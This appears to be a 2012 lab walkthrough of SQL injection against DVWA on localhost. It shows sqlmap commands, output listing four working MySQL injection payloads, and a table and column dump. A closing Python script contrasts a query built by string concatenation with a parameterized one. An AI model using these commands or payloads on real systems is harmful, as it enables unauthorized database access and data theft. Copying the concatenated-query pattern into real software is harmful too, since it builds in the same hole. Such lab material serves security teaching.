Wednesday 1 February 2012

SQL injection in localhost/dvwa

First, open localhost/dvwa in your browser:

Then choose the SQL Injection menu entry, enter 1 in the User ID form field and submit it; DVWA will show the result as below:


Then open sqlmap and type this command:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" --string="Surname" --dbs


Below is part of the result of that command:


Then type this command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 11:52:34

[11:52:34] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:52:34] [INFO] resuming injection data from session file
[11:52:34] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---

[11:52:34] [INFO] manual usage of GET payloads requires url encoding
[11:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:52:34] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[11:52:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 11:52:35


Then type this command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -T users -C user_id --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 11:56:20

[11:56:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:56:20] [INFO] resuming injection data from session file
[11:56:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---

[11:56:20] [INFO] manual usage of GET payloads requires url encoding
[11:56:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:56:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[11:56:20] [INFO] fetching current database
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[11:56:23] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[11:56:23] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1       |
| 3       |
| 2       |
| 5       |
| 4       |
+---------+

[11:56:23] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[11:56:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 11:56:23
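The injection points sqlmap lists above all work for the same reason: the DVWA "low" page pastes the id parameter straight into its SQL string. The script below is an added example (not DVWA's or sqlmap's code) that rebuilds that query against a constructed in-memory SQLite copy of the users table and replays the boolean-based blind payload from the output above against both the concatenated query and a parameterized one. The DVWA query shape (SELECT first_name, last_name FROM users WHERE user_id = '$id') and the sample rows are assumptions.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (assumed schema: user_id, first_name, last_name).
SAMPLE_USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
                (4, "Pablo", "Picasso"), (5, "Bob", "Smith")]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con

def lookup_vulnerable(con, user_id):
    # Mirrors the DVWA "low" pattern (assumed): the id is pasted into the SQL text,
    # so a quote in the input ends the literal and the rest becomes SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return con.execute(sql).fetchall()

def lookup_parameterized(con, user_id):
    # Hardened form: the value is bound as a parameter, so it is only ever compared as data.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()

# The boolean-based blind payload sqlmap reported above (URL-decoded), plus a
# variant whose injected condition is false.
PAYLOAD_TRUE = "1' AND 1935=1935 AND 'vLTC'='vLTC"
PAYLOAD_FALSE = "1' AND 1935=1936 AND 'vLTC'='vLTC"

def blind_oracle(lookup, con):
    """True if the true/false payload pair produces different responses.

    That response difference is exactly what sqlmap checks for (here via
    --string="Surname") to infer data one condition at a time.
    """
    return lookup(con, PAYLOAD_TRUE) != lookup(con, PAYLOAD_FALSE)

if __name__ == "__main__":
    con = make_db()
    print("concatenated query leaks a blind oracle:", blind_oracle(lookup_vulnerable, con))
    print("parameterized query leaks a blind oracle:", blind_oracle(lookup_parameterized, con))
```

With the parameterized query the whole payload is compared against user_id as one string, so both variants return no rows and the true/false distinction sqlmap relies on disappears.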


